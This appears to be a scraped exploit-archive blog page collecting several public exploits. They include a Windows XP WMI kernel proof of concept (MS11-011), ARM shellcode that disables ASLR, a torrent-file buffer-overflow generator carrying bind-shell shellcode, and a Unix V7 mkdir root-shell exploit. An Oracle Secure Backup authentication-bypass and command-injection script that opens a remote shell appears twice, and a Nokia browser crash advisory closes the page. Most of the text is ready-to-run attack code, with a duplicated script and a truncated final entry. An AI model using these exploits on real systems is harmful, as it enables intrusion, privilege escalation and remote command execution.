/*
# Exploit Title: MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC
# Version: prior to MS11-011
# Tested on: Win XP SP3
# CVE : CVE-2011-0045
# Status : Patched
*/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include <strsafe.h>
#include <wmistr.h>
#include <evntrace.h>
#define WmiTraceMessageCode 40
#define WmiCreateUMLogger 84
#define WmiStartLoggerCode 32
#define IOCTL_WMI_TRACE_MESSAGE \
CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,
METHOD_NEITHER, FILE_WRITE_ACCESS)
/*
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)
#define IOCTL_WMI_TRACE_MESSAGE \
CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,
METHOD_NEITHER, FILE_WRITE_ACCESS)
#define IOCTL_WMI_CREATE_UM_LOGGER CTL_CODE(FILE_DEVICE_UNKNOWN,
WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_WMI_START_LOGGER \
CTL_CODE(FILE_DEVICE_UNKNOWN, WmiStartLoggerCode,
METHOD_BUFFERED, FILE_ANY_ACCESS)
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef struct _STRING64 {
USHORT Length;
USHORT MaximumLength;
ULONGLONG Buffer;
} STRING64;
typedef STRING64 *PSTRING64;
typedef STRING64 UNICODE_STRING64;
typedef UNICODE_STRING64 *PUNICODE_STRING64;
//
// WNODE definition
typedef struct _WNODE_HEADER
{
ULONG BufferSize; // Size of entire buffer inclusive of this
ULONG
ULONG ProviderId; // Provider Id of driver returning this buffer
union
{
ULONG64 HistoricalContext; // Logger use
struct
{
ULONG Version; // Reserved
ULONG Linkage; // Linkage field reserved for WMI
};
};
union
{
ULONG CountLost; // Reserved
HANDLE KernelHandle; // Kernel handle for data block
LARGE_INTEGER TimeStamp; // Timestamp as returned in units of 100ns
// since 1/1/1601
};
GUID Guid; // Guid for data block returned with results
ULONG ClientContext;
ULONG Flags; // Flags, see below
} WNODE_HEADER, *PWNODE_HEADER;
//
// Logger configuration and running statistics. This structure is used
// by WMI.DLL to convert to UNICODE_STRING
//
// begin_wmikm
typedef struct _WMI_LOGGER_INFORMATION {
WNODE_HEADER Wnode; // Had to do this since wmium.h comes later
//
// data provider by caller
ULONG BufferSize; // buffer size for logging (in
kbytes)
ULONG MinimumBuffers; // minimum to preallocate
ULONG MaximumBuffers; // maximum buffers allowed
ULONG MaximumFileSize; // maximum logfile size (in MBytes)
ULONG LogFileMode; // sequential, circular
ULONG FlushTimer; // buffer flush timer, in seconds
ULONG EnableFlags; // trace enable flags
LONG AgeLimit; // aging decay time, in minutes
ULONG Wow; // TRUE if the logger started
under WOW64
union {
HANDLE LogFileHandle; // handle to logfile
ULONG64 LogFileHandle64;
};
// data returned to caller
// end_wmikm
union {
// begin_wmikm
ULONG NumberOfBuffers; // no of buffers in use
// end_wmikm
ULONG InstanceCount; // Number of Provider Instances
};
union {
// begin_wmikm
ULONG FreeBuffers; // no of buffers free
// end_wmikm
ULONG InstanceId; // Current Provider's Id for
UmLogger
};
union {
// begin_wmikm
ULONG EventsLost; // event records lost
// end_wmikm
ULONG NumberOfProcessors; // Passed on to UmLogger
};
// begin_wmikm
ULONG BuffersWritten; // no of buffers written to file
ULONG LogBuffersLost; // no of logfile write failures
ULONG RealTimeBuffersLost; // no of rt delivery failures
union {
HANDLE LoggerThreadId; // thread id of Logger
ULONG64 LoggerThreadId64; // thread is of Logger
};
union {
UNICODE_STRING LogFileName; // used only in WIN64
UNICODE_STRING64 LogFileName64; // Logfile name: only in WIN32
};
// mandatory data provided by caller
union {
UNICODE_STRING LoggerName; // Logger instance name in WIN64
UNICODE_STRING64 LoggerName64; // Logger Instance name in WIN32
};
// private
union {
PVOID Checksum;
ULONG64 Checksum64;
};
union {
PVOID LoggerExtension;
ULONG64 LoggerExtension64;
};
} WMI_LOGGER_INFORMATION, *PWMI_LOGGER_INFORMATION;
*/
typedef struct _WMI_TRACE_MESSAGE_PACKET { // must be ULONG!!
USHORT MessageNumber; // The message Number, index
of messages by GUID
// Or ComponentID
USHORT OptionFlags ; // Flags associated with the
message
} WMI_TRACE_MESSAGE_PACKET, *PWMI_TRACE_MESSAGE_PACKET;
typedef struct _MESSAGE_TRACE_HEADER {
union {
ULONG Marker;
struct {
USHORT Size; // Total Size of the
message including header
UCHAR Reserved; // Unused and reserved
UCHAR Version; // The message structure
type (TRACE_MESSAGE_FLAG)
};
};
union {
ULONG Header; // both sizes must be the same!
WMI_TRACE_MESSAGE_PACKET Packet;
};
} MESSAGE_TRACE_HEADER, *PMESSAGE_TRACE_HEADER;
typedef struct _MESSAGE_TRACE {
MESSAGE_TRACE_HEADER MessageHeader ;
UCHAR Data ;
} MESSAGE_TRACE, *PMESSAGE_TRACE ;
//
// Structure used to pass user log messages to the kernel
//
typedef struct _MESSAGE_TRACE_USER {
MESSAGE_TRACE_HEADER MessageHeader ;
ULONG MessageFlags ;
ULONG64 LoggerHandle ;
GUID MessageGuid ;
ULONG DataSize ;
UCHAR Data ;
} MESSAGE_TRACE_USER, *PMESSAGE_TRACE_USER ;
/*
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR
PVOID SecurityQualityOfService; // Points to type
SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
typedef union
{
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
} HANDLE3264, *PHANDLE3264;
typedef struct
{
IN POBJECT_ATTRIBUTES ObjectAttributes;
IN GUID ControlGuid;
OUT HANDLE3264 ReplyHandle;
OUT ULONG ReplyCount;
} WMICREATEUMLOGGER, *PWMICREATEUMLOGGER;
*/
//#define LOGFILE_PATH L"<FULLPATHTOLOGFILE.etl>"
#define LOGFILE_PATH L"test.etl"
//#define LOGSESSION_NAME L"My Event Trace Session"
#define LOGSESSION_NAME L"test"
// GUID that identifies your trace session.
// Remember to create your own session GUID.
// {94BE0BF2-885F-4972-8461-A7D83B53F1AD}
static const GUID SessionGuid =
{ 0x94be0bf2, 0x885f, 0x4972, { 0x84, 0x61, 0xa7, 0xd8, 0x3b, 0x53,
0xf1, 0xad } };
// GUID that identifies the provider that you want
// to enable to your session.
// {7C214FB1-9CAC-4b8d-BAED-7BF48BF63BB3}
static const GUID ProviderGuid =
{ 0x7c214fb1, 0x9cac, 0x4b8d, { 0xba, 0xed, 0x7b, 0xf4, 0x8b, 0xf6,
0x3b, 0xb3 } };
int trigger(HANDLE hDevice);
int start_usermode_logger(HANDLE hDevice);
int start_logger(HANDLE hDevice);
HANDLE open_device();
int main(int argc, char **argv)
{
HANDLE hDevice;
if((hDevice = open_device()) == INVALID_HANDLE_VALUE){
printf("open_device failed!\n");
return 0;
}
if(!start_usermode_logger(hDevice)){
printf("start_usermode_logger failed!\n");
return 0;
}
/*
if(!start_logger(hDevice)){
printf("start_logger failed!\n");
return 0;
}
*/
trigger(hDevice);
return 0;
}
HANDLE open_device()
{
char deviceName[] = "\\\\.\\WMIDataDevice";
HANDLE hDevice;
if ( (hDevice = CreateFileA(deviceName,
GENERIC_READ|GENERIC_WRITE,
//0,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
return hDevice;
}
else
{
printf("Error: Error opening device at NULL premission\n");
return INVALID_HANDLE_VALUE;
}
}
int start_usermode_logger(HANDLE hDevice)
{
ULONG status = ERROR_SUCCESS;
TRACEHANDLE SessionHandle = 0;
EVENT_TRACE_PROPERTIES* pSessionProperties = NULL;
ULONG BufferSize = 0;
BOOL TraceOn = TRUE;
// Allocate memory for the session properties. The memory must
// be large enough to include the log file name and session name,
// which get appended to the end of the session properties structure.
BufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) +
sizeof(LOGSESSION_NAME);
pSessionProperties = (EVENT_TRACE_PROPERTIES*) malloc(BufferSize);
if (NULL == pSessionProperties)
{
wprintf(L"Unable to allocate %d bytes for properties
structure.\n", BufferSize);
return 0;
}
// Set the session properties. You only append the log file name
// to the properties structure; the StartTrace function appends
// the session name for you.
ZeroMemory(pSessionProperties, BufferSize);
pSessionProperties->Wnode.BufferSize = BufferSize;
pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
pSessionProperties->Wnode.Guid = SessionGuid;
pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR |
EVENT_TRACE_USE_PAGED_MEMORY;
pSessionProperties->MaximumFileSize = 5; // 5 MB
pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
pSessionProperties->LogFileNameOffset =
sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
StringCbCopy((LPWSTR)((char*)pSessionProperties +
pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);
// Create the trace session.
status = StartTrace((PTRACEHANDLE)&SessionHandle, LOGSESSION_NAME,
pSessionProperties);
if (ERROR_SUCCESS != status)
{
wprintf(L"StartTrace() failed with %lu\n", status);
return 0;
}
// Enable the providers that you want to log events to your session.
status = EnableTrace(
TraceOn, // TRUE enables the provider
0, // No enable flags
TRACE_LEVEL_INFORMATION, // Enable informational, warning, error
and critical events
(LPCGUID)&ProviderGuid, // Provider to enable
SessionHandle // Session handle from StartTrace
);
if (ERROR_SUCCESS != status)
{
wprintf(L"EnableTrace() failed with %lu\n", status);
TraceOn = FALSE;
return 0;
}
wprintf(L"Run the provider application. Then hit any key to stop the
session.\n");
return 1;
}
int trigger(HANDLE hDevice)
{
DWORD cb, inlen, outlen;
char *buff, *buff_out = NULL;
DWORD result = 0;
unsigned char str[] = "fuckdata";
MESSAGE_TRACE_USER Message;
Message.MessageHeader.Marker = 0xBEBEBEBE;
Message.MessageHeader.Header = 0xEFEFEFEF;
Message.MessageFlags = 0xC0C0DEDE;
//Message.LoggerHandle = 0xC0DEC0DEDEADDEAD;
//Message.LoggerHandle = 0xC0DEC0DE12340001;//last WORD should be in
1 < n < 40
Message.LoggerHandle = 0xC0DEC0DE12340000;//last WORD should be in 1
< n < 40
Message.MessageGuid.Data1 = 0xC0DEDEAD;
Message.MessageGuid.Data2 = 0xDEC0;
Message.MessageGuid.Data3 = 0xDEDE;
memcpy(Message.MessageGuid.Data4, str, 8);
//Message.DataSize = 0xDEADBEEF;
//Message.DataSize = 0x0000FFFE;//in fixed versioon should be < 0x1FD0
Message.DataSize = 0x00010FF0;//in fixed versioon should be < 0x1FD0
Message.Data = '0';
//DWORD ioctl = 0x2280A3;
buff_out = (char*)malloc(0x2000);
if(!buff_out){
printf("malloc failed");
return 0;
}
memset(buff_out, 0x0, 0x2000);
cb = 0;
buff = (char*)malloc(0x20000);
if(!buff){
printf("malloc failed");
return 0;
}
memset(buff, 'A', 0x20000-1);
outlen = 0x0;
inlen = 0x15000;
memcpy(buff, &Message, 0x30);
//result = DeviceIoControl(hDevice, IOCTL_WMI_TRACE_MESSAGE,
(LPVOID)&Message, inlen, (LPVOID)buff_out, outlen, &cb, NULL);
for(int i =0; i< 0x40; i++){
Message.LoggerHandle++;
memset(buff, 'A', 0x20000-1);
memcpy(buff, &Message, 0x30);
result = DeviceIoControl(hDevice, IOCTL_WMI_TRACE_MESSAGE,
(LPVOID)buff, inlen, (LPVOID)buff_out, outlen, &cb, NULL);
printf("ioctl = 0x%08X, id = %d, result = %d\n",
IOCTL_WMI_TRACE_MESSAGE, i, result);
}
printf("done!");
free(buff);
}Tuesday, April 26, 2011
MS Windows XP WmiTraceMessageVa Integer
Saturday, April 23, 2011
linux/ARM - Disable ASLR Security - 102 bytes
============================================= linux/ARM - Disable ASLR Security - 102 bytes ============================================= /* Title: Linux/ARM - Disable ASLR Security - 102 bytes Date: 2010-06-20 Tested: Linux ARM9 2.6.28-6-versatile ! Database of shellcodes http://www.shell-storm.org/shellcode/ Description: ============ Address space layout randomization (ASLR) is a computer security technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space. This shellcode disables the ASLR on linux/ARM */ #include <stdio.h> char *SC = "\x01\x30\x8f\xe2" // add r3, pc, #1 "\x13\xff\x2f\xe1" // bx r3 "\x24\x1b" // subs r4, r4, r4 "\x20\x1c" // adds r0, r4, #0 "\x17\x27" // movs r7, #23 "\x01\xdf" // svc 1 "\x78\x46" // mov r0, pc "\x2e\x30" // adds r0, #46 "\xc8\x21" // movs r1, #200 "\xc8\x31" // adds r1, #200 "\xc8\x31" // adds r1, #200 "\xc8\x31" // adds r1, #200 "\xc8\x31" // adds r1, #200 "\x59\x31" // adds r1, #89 "\xc8\x22" // movs r2, #200 "\xc8\x32" // adds r2, #200 "\x14\x32" // adds r2, #20 "\x05\x27" // movs r7, #5 "\x01\xdf" // svc 1 "\x03\x20" // movs r0, #3 "\x79\x46" // mov r1, pc "\x0e\x31" // adds r1, #14 "\x02\x22" // movs r2, #2 "\x04\x27" // movs r7, #4 "\x01\xdf" // svc 1 "\x92\x1a" // subs r2, r2, r2 "\x10\x1c" // adds r0, r2, #0 "\x01\x27" // movs r7, #1 "\x01\xdf" // svc 1 "\x30\x0a" // ^ "\x2d\x2d" // | "\x2f\x2f" // | "\x70\x72" // | "\x6f\x63" // | "\x2f\x73" // | "\x79\x73" // | "\x2f\x6b" // | "\x65\x72" // | "\x6e\x65" // | [ strings ] "\x6c\x2f" // | "\x72\x61" // | "\x6e\x64" // | "\x6f\x6d" // | "\x69\x7a" // | "\x65\x5f" // | "\x76\x61" // | "\x5f\x73" // | "\x70\x61" // | "\x63\x65"; // v int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0;
}
cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit
========================================================= cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit ========================================================= #!/usr/bin/python #Stack Based Buffer Overflow #The vulnerability is in the btFiles::BuildFromMI function #inside the btfiles.cpp file #Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386 #Can't get the exploit working on a modern linux kernel because of ASLR #code is using python 2.5 #Home page for cTorrent 1.3.4: #http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads #dTorrent 3.3.2 is also vulnerable: #http://sourceforge.net/projects/dtorrent/ 18,000+ downloads import sys import os #This code will take any torrent file and turn it into an exploit. USAGE="python exploit.py in_file.torrent out_file.torrent" def main(): #Start of the program bfile=fileio() try: bad_torrent=bfile.read_bencode(sys.argv[1]) except: print USAGE sys.exit() exploit_str=create_exploit() print("Writing Bytes:"+str(len(exploit_str))) bad_torrent["info"]["files"][0]["path"][0]=exploit_str try: bfile.write_bencode(sys.argv[2], bad_torrent) except: print USAGE sys.exit() def create_exploit(): # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27" shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24" shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d" shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad" shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17" shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26" shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce" #The exact address of our buffer is 0xbffffccc, which ebx tells us #however memeory changes before we control the eip, #so we change the addr to hit the NOP sled eip="\x11\xf1\xff\xbf" #eip="\xcc\xfc\xff\xbf"#the add ebx is holding #this is a dummy address to satisfy other pointer before we return #this cannot be the EIP becuase this location is written to! dumb_addr="\xcc\xfc\xff\xbf" #nop sled long_str="\x90"*(4028-len(shellcode)) #memory around the shellcode is written to, but this is a safe place long_str+=shellcode #this 100byte buffer is written to before we control the eip long_str+="\x90"*100 long_str+=eip#4128 bytes is the EIP! #This pointer must be real becuase it is written to in btFiles::BuildFromMI long_str+=dumb_addr#"this" #We can control these addresses but we don't need them #long_str+=dumb_addr#"metabuf" #long_str+=dumb_addr#"saveas" return long_str #Start of functions for bencoding: def BTFailure(msg): pass def decode_int(x, f): f += 1 newf = x.index('e', f) n = int(x[f:newf]) if x[f] == '-': if x[f + 1] == '0': raise ValueError elif x[f] == '0' and newf != f+1: raise ValueError return (n, newf+1) def decode_string(x, f): colon = x.index(':', f) n = int(x[f:colon]) if x[f] == '0' and colon != f+1: raise ValueError colon += 1 return (x[colon:colon+n], colon+n) def decode_list(x, f): r, f = [], f+1 while x[f] != 'e': v, f = decode_func[x[f]](x, f) r.append(v) return (r, f + 1) def decode_dict(x, f): r, f = {}, f+1 while x[f] != 'e': k, f = decode_string(x, f) r[k], f = decode_func[x[f]](x, f) return (r, f + 1) decode_func = {} decode_func['l'] = decode_list decode_func['d'] = decode_dict decode_func['i'] = decode_int decode_func['0'] = decode_string decode_func['1'] = decode_string decode_func['2'] = decode_string decode_func['3'] = decode_string decode_func['4'] = decode_string decode_func['5'] = decode_string decode_func['6'] = decode_string decode_func['7'] = decode_string decode_func['8'] = decode_string decode_func['9'] = decode_string def bdecode(x): try: r, l = decode_func[x[0]](x, 0) except (IndexError, KeyError, ValueError): raise BTFailure("not a valid bencoded string") if l != len(x): raise BTFailure("invalid bencoded value (data after valid prefix)") return r from types import StringType, IntType, LongType, DictType, ListType, TupleType class Bencached(object): __slots__ = ['bencoded'] def __init__(self, s): self.bencoded = s def encode_bencached(x,r): r.append(x.bencoded) def encode_int(x, r): r.extend(('i', str(x), 'e')) def encode_bool(x, r): if x: encode_int(1, r) else: encode_int(0, r) def encode_string(x, r): r.extend((str(len(x)), ':', x)) def encode_list(x, r): r.append('l') for i in x: encode_func[type(i)](i, r) r.append('e') def encode_dict(x,r): r.append('d') ilist = x.items() ilist.sort() for k, v in ilist: r.extend((str(len(k)), ':', k)) encode_func[type(v)](v, r) r.append('e') encode_func = {} encode_func[Bencached] = encode_bencached encode_func[IntType] = encode_int encode_func[LongType] = encode_int encode_func[StringType] = encode_string encode_func[ListType] = encode_list encode_func[TupleType] = encode_list encode_func[DictType] = encode_dict try: from types import BooleanType encode_func[BooleanType] = encode_bool except ImportError: pass def bencode(x): r = [] encode_func[type(x)](x, r) return ''.join(r) class fileio: def read_bencode(self,file): infile = open(file,"r") file=infile.read() infile.close return bdecode(file) #writes a dictionary to a bencoded file def write_bencode(self,file,dict): outfile = open(file, 'wb') outfile.write(bencode(dict)) outfile.close() #execute main main()
Thursday, April 21, 2011
UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit
========================================================= UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit ========================================================= /* * Exploit for /bin/mkdir Unix V7 PDP-11. * mkdir has a buffer overflow when checking if the directory * in /arg/with/slashes/fname exists. * * This will run /bin/sh with euid 0, but not uid 0. Since * the shell doesn't do anything special about this, don't * really care. If you care, run setuid(0); execl("/bin/sh", 0); */ /* .globl _main _main: mov pc,r1 sub $-[sh-_main-2], r1 / pointer to sh mov r1, r2 sub $-8, r2 clrb -1(r2) / null terminate mov r1, r2 clr -(r1) / char *env[] = {0} mov r1, r3 mov r2, -(r1) / char *argv[] = {sh, 0} mov r1, r4 mov r3, -(r1) / reverse of sh,argv,env mov r4, -(r1) mov r2, -(r1) sys 59.; 11111; 11111; 11111 / call execve argv: 11111; 11111 sh: </bin/sh> */ char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020, 0302, 0345, 0370, 0377, 062, 0212, 0377, 0377, 0102, 020, 041, 012, 0103, 020, 0241, 020, 0104, 020, 0341, 020, 041, 021, 0241, 020, 073, 0211, 0111, 022, 0111, 022, 0111, 022, 0111, 022, 0111, 022, 057, 0142, 0151, 0156, 057, 0163, 0150, 0 }; #define NOPSLIDE 50 #define CNT 136 #define PC 0xfea0 main(argc, argv) int argc; char **argv; { char buf[400]; int i; char *argv2[4]; /* nop slide + egg */ for(i = 0; i < NOPSLIDE; ) { buf[i++] = 0301; buf[i++] = 021; } strcpy(buf + i, egg); /* pad out to CNT */ for(i = strlen(buf); i < CNT; i++) buf[i] = 'a'; /* overwrite retaddr */ buf[i++] = PC & 0xff; buf[i++] = PC >> 8; /* extra stuff */ buf[i++] = '/'; buf[i++] = 'a'; buf[i++] = 0; argv2[0] = "/bin/mkdir"; argv2[1] = buf; argv2[2] = 0; execv(argv2[0], argv2); return 0; }
Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit
==============================================================
#!/bin/bash
#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978
#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3
#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.
#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/
#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009
clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <target IP>"
echo "i.e.: ./$(basename $0) 192.168.0.100"
exit
fi
if ! which curl >/dev/null
then
echo "'curl' is required in order to handle HTTPS connections"
exit
fi
TARGET=$1
#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`
if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi
echo "[+] I got a valid token: $session"
#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`
if [[ -z $check ]]
then
echo "[!] Fatal error. I cannot execute arbitrary commands"
exit
fi
echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check
while(true); do
echo -n \>
read -r cmd
if [ "$cmd" == "EXIT" ]
then
echo "[+] Removing the temporary file and closing"
shell="1%26del%20osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
exit
fi
#URLencode function
cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
shell="1%26$cmd>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
echo "[+] Last successful command execution:"
curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end
Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit
==============================================================#!/bin/bash
#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978
#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3
#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.
#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/
#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009
clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <target IP>"
echo "i.e.: ./$(basename $0) 192.168.0.100"
exit
fi
if ! which curl >/dev/null
then
echo "'curl' is required in order to handle HTTPS connections"
exit
fi
TARGET=$1
#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`
if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi
echo "[+] I got a valid token: $session"
#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`
if [[ -z $check ]]
then
echo "[!] Fatal error. I cannot execute arbitrary commands"
exit
fi
echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check
while(true); do
echo -n \>
read -r cmd
if [ "$cmd" == "EXIT" ]
then
echo "[+] Removing the temporary file and closing"
shell="1%26del%20osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
exit
fi
#URLencode function
cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
shell="1%26$cmd>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
echo "[+] Last successful command execution:"
curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end
Nokia Mini Map Browser (array sort) Silent Crash Vulnerability
============================================================== Nokia Mini Map Browser (array sort) Silent Crash Vulnerability ============================================================== ==================================================== Security Research Advisory Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability Advisory number: LC-2008-04 Advisory URL: http://www.ikkisoft.com ==================================================== 1) Affected Software * Nokia Mini Map Browser (S60WebKit <= 21772) The tested device has the following User-Agent: Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML) Safari/413 Note: Although the Nokia Web Browser is built upon a port of the open source WebKit used by Apple for its browser, the iPhone is not affected (at least the iPhone firmware version 2.0.2(5C1)) ==================================================== 2) Severity Severity: Low Local/Remote: Remote ==================================================== 3) Summary The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web browser for the S60 mobile
phone platform developed by Nokia. It is built upon S60WebKit, a port of the open source WebKit project to the S60 platform.
According to several sources, the S60 software on Symbian OS is the world’s most popular software for smartphones. This version of the Nokia Mini Map Browser does not properly validate JavaScript input embedded in visited HTML pages. An aggressor can easily trigger
Denial of Service attacks. References: http://opensource.nokia.com/projects/S60browser/ http://en.wikipedia.org/wiki/Web_Browser_for_S60 ==================================================== 4) Vulnerability Details The Nokia Mini Map Browser is prone to a vulnerability that may result in the application silent crash. Arbitrary code execution is probably not possible. The problem arises in the JavaScript core of the S60WebKit, invoking the sort() function on a recursive array. A similar behavior was observed some years ago in several browsers due to the common code base (BID-12331, BID-11762, BID-11760, BID-11759, BID-11752). ==================================================== 5) Exploit Embed in an HTML page the following JavaScript: <script> foo = new Array(); while(true) {foo = new Array(foo).sort();} </script> ==================================================== 6) Fix Information n/a ==================================================== 7) Time Table 08/09/2008 - Vendor notified. 15/09/2008 - Vendor response. ??/??/???? - Vendor patch release. 10/10/2008 - Public disclosure. ==================================================== 8) Credits
TO ALL
==================================================== 9) Legal Notices The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community. There are no warranties with regard to this information. The author does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Permission is hereby granted for the redistribution of this alert, provided that the content is not altered in any way, except reformatting, and that due credit is given. This vulnerability has been disclosed in accordance with the RFP Full-Disclosure Policy v2.0, available at: http://www.wiretrip.net/rfp/policy.html
Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit
